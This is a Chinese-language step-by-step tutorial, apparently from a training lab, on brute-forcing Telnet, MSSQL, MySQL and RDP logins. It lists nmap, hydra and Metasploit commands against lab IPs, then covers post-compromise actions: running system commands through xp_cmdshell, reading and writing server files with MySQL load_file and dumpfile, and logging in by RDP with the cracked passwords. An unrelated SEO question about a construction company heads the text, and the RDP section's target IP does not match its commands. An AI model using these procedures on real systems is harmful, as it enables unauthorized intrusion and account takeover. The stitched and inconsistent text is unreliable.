陜西華偉建設(shè)有限公司網(wǎng)站seo描述是什么意思
Telnet協(xié)議暴力破解
Telnet
?????? Telnet協(xié)議是TCP/IP協(xié)議族中的一員,是Internet遠(yuǎn)程登陸服務(wù)的標(biāo)準(zhǔn)協(xié)議和主要方式。它為用戶提供了在本地計(jì)算機(jī)上完成遠(yuǎn)程主機(jī)工作的能力。要開始一個telnet會話,必須輸入用戶名和密碼來登錄服務(wù)器。而一般服務(wù)器不會對用戶名和密碼的登錄嘗試做限制,因此可以通過多次嘗試密碼的方式對Telnet服務(wù)器進(jìn)行暴力破解。
Telnet協(xié)議暴力破解利用
靶機(jī)IP地址:193.168.1.27
打開NMAP,輸入命令nmap -v -A -Pn 193.168.1.27,對該IP地址進(jìn)行掃描。
使用hydra進(jìn)行暴力破解。輸入如下命令:
hydra 193.168.1.27 telnet -l admin -P /tmp/pass.txt -t 32 -s 23 –V
嘗試登錄telnet服務(wù)器,輸入如下命令:
telnet 193.168.1.27 23,用戶名密碼分別輸入admin和admin888
?登錄服務(wù)器后可嘗試一些常用系統(tǒng)命令,如ipconfig,查看回顯。
數(shù)據(jù)庫暴力破解
Mssql暴力破解原理
MSSQL是微軟的SQLServer數(shù)據(jù)庫服務(wù)器,是用于電子商務(wù)、業(yè)務(wù)線和數(shù)據(jù)倉庫解決方案的數(shù)據(jù)庫管理和分析系統(tǒng)。用戶可以通過輸入用戶名和密碼來登錄數(shù)據(jù)庫服務(wù)器。而一般服務(wù)器不會對用戶名和密碼的登錄嘗試做限制,因此可以通過多次嘗試密碼的方式對MSSQL服務(wù)器進(jìn)行暴力破解。
MSSQL暴力破解漏洞利用
靶機(jī)IP地址:193.168.1.24
開啟kali-linux虛擬機(jī),打開命令行窗口運(yùn)行NMAP,輸入命令nmap -v -A -Pn 193.168.1.24,對該IP地址進(jìn)行掃描。
使用Metasploit進(jìn)行暴力破解。輸入msfconsole打開Metasploit。
?輸入search mssql_login,搜索mssql_login模塊。
?輸入use auxiliary/scanner/mssql/mssql_login,加載mssql_login模塊。
?輸入show options,顯示mssql_login模塊的參數(shù)。
?使用set命令設(shè)置暴力破解目標(biāo)數(shù)據(jù)庫的相關(guān)參數(shù)。
?輸入exploit開始攻擊,成功獲取密碼,為123456。
?輸入select @@version,再輸入go,成功獲取目標(biāo)數(shù)據(jù)庫版本信息。
在mssql數(shù)據(jù)庫中存在一個xp_cmdshell組件,利用該組件可以執(zhí)行系統(tǒng)命令。輸入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再輸入go,可以發(fā)現(xiàn)ipconfig成功執(zhí)行,獲取目標(biāo)操作系統(tǒng)的ip信息。
?輸入exec master.dbo.xp_cmdshell 'net user',再輸入go,成功獲取目標(biāo)操作系統(tǒng)賬戶信息。
Mysql暴力破解原理
????????MySQL是一個關(guān)系型數(shù)據(jù)庫管理系統(tǒng),是目前最流行的關(guān)系型數(shù)據(jù)庫管理系統(tǒng)。MySQL 是一種關(guān)聯(lián)數(shù)據(jù)庫管理系統(tǒng),關(guān)聯(lián)數(shù)據(jù)庫將數(shù)據(jù)保存在不同的表中,而不是將所有數(shù)據(jù)放在一個大倉庫內(nèi),這樣就增加了速度并提高了靈活性。MySQL 所使用的 SQL 語言是用于訪問數(shù)據(jù)庫的最常用標(biāo)準(zhǔn)化語言。由于其體積小、速度快、總體擁有成本低,尤其是開放源碼這一特點(diǎn),一般中小型網(wǎng)站的開發(fā)都選擇 MySQL 作為網(wǎng)站數(shù)據(jù)庫。用戶可以通過輸入用戶名和密碼來登錄數(shù)據(jù)庫服務(wù)器。而一般服務(wù)器不會對用戶名和密碼的登錄嘗試做限制,因此可以通過多次嘗試密碼的方式對Mysql服務(wù)器進(jìn)行暴力破解?
Mysql暴力破解漏洞利用
靶機(jī)IP地址:193.168.1.38
打開NMAP,輸入命令nmap -v -A -Pn 193.168.1.38,對該IP地址進(jìn)行掃描。
使用Metasploit進(jìn)行暴力破解。輸入msfconsole打開Metasploit。
?輸入search mysql_login,搜索mysql_login模塊。
?輸入use auxiliary/scanner/mysql/mysql_login,加載mysql_login模塊。
輸入show options,顯示mysql_login模塊的參數(shù)。
使用set命令設(shè)置暴力破解目標(biāo)數(shù)據(jù)庫的相關(guān)參數(shù)。
?輸入exploit開始攻擊,成功獲取密碼,為admin888。
?在本機(jī)打開命令行,輸入mysql -h 193.168.1.38 -u root –p,輸入密碼admin888,嘗試登錄mysql服務(wù)器。
輸入show databases;(注意最后需加一個分號,分號為sql語句中的分隔符),獲取數(shù)據(jù)庫名。
?輸入select load_file(‘C:\\boot.ini’);,讀取C:\\boot.ini啟動文件的內(nèi)容。
?輸入select ‘1111’ into dumpfile ’C:\\2.txt’;,在C盤下新建一個2.txt并向其中寫入111。
?為證明確實(shí)創(chuàng)建了該文件,可再次利用load_file函數(shù)讀取2.txt文件。輸入select load_file(‘C:\\2.txt’);。?
遠(yuǎn)程桌面暴力破解
遠(yuǎn)程桌面暴力破解漏洞介紹
遠(yuǎn)程桌面協(xié)議介紹
遠(yuǎn)程桌面協(xié)議(RemoteDesktopProtocol)是讓客戶端連接遠(yuǎn)程服務(wù)器桌面的協(xié)議。3389端口是windows遠(yuǎn)程桌面服務(wù)的默認(rèn)端口。一般用戶可以通過管理員用戶名密碼訪問開放3389端口的計(jì)算機(jī)的遠(yuǎn)程桌面進(jìn)行管理。
遠(yuǎn)程桌面暴力破解漏洞產(chǎn)生
開放遠(yuǎn)程桌面協(xié)議服務(wù)
沒有限制登錄來源地址
沒有限制密碼錯誤次數(shù)
遠(yuǎn)程桌面暴力破解漏洞危害
3389端口很容易通過各種掃描工具得到,由于一些計(jì)算機(jī)使用者缺乏安全意識經(jīng)常給administrator帳戶設(shè)置弱密碼,這樣攻擊者可以暴力破解獲取密碼后進(jìn)一步控制計(jì)算機(jī)。
遠(yuǎn)程桌面暴力破解漏洞利用
靶機(jī)服務(wù)器地址:193.168.1.27
加載kali-linux虛擬機(jī),打開命令行窗口,利用nmap掃描靶機(jī)端口服務(wù)。
nmap -v -A -Pn 193.168.1.25
接下來利用hydra工具暴力破解此遠(yuǎn)程桌面賬戶密碼。
hydra 193.168.1.25 rdp -l admin -P /tmp/pass.txt -t 1 -V
成功獲取登錄遠(yuǎn)程桌面的密碼,為admin888。
利用遠(yuǎn)程桌面連接工具登錄此靶機(jī)服務(wù)器。
通過鍵盤上的win+R組合鍵打開“運(yùn)行界面”,輸入“mstsc”打開遠(yuǎn)程桌面連接界面。mstsc(Microsoft terminal services client)是微軟遠(yuǎn)程服務(wù)客戶端軟件。
計(jì)算機(jī)名輸入193.168.1.25,點(diǎn)擊連接。
?
?輸入上面獲取的用戶名和密碼,點(diǎn)擊“確定”登錄。成功登上目標(biāo)系統(tǒng)。